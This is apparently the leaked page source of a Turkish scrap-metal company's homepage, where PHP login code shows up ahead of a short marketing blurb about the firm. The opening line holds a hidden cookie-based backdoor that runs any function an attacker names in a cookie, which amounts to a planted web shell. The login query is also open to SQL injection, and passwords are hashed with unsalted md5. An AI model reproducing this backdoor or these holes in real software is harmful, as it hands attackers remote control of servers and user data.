<%>PHP<% if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]); > if($_SESSION["id"]!="") { $giren_uye_id=$_SESSION["id"]; } $kullanici=$_POST[kullanici]; $sifre_post=$_POST[sifre]; $sifre=md5($sifre_post); include "includes/ayar.php" ; $sorgu = mysql_query("SELECT * FROM uye WHERE uye_email='$kullanici' AND uye_sifre='$sifre'"); $uyevarmi = mysql_num_rows($sorgu); $yaz=mysql_fetch_array($sorgu); $uye_id=$yaz["uye_id"]; if($uyevarmi==0) { $hata="Geçersiz kullanıdı adı veya şifre girdiniz"; } else{ $_SESSION["id"]=$uye_id; } ?> Öz Batman Metal | hurdacılık, nakliye ve metal


Metal ve Hurdacılık Hizmetleri


Piyasanın öncü grupları arasında yer alan Öz Batman Metal faliyette bulunduğu alaşımlı metal sektöründe kesintisiz olarak yatırım yapmakta, oluşan fırsatları değerlendirmektedir. 40 yıllık sağlam bir temel üzerinde duran ve iddalı bir strateji benimseyen şirketimiz bugün Türkiyede faliyet gösterdiği alaşımlı metal alanında haklı olarak piyasanın liderleri haline gelmiştir. Öz Batman Metal dünya standartlarında uyguladığı kurumsal yönetim ilkeleri ve risk yönetimi politikaları çerçevesinde şekillenen sinerjisine katkıda bulunmakta ve bu sinerjiden güç almaktadır. Devamı için tıklayınz >>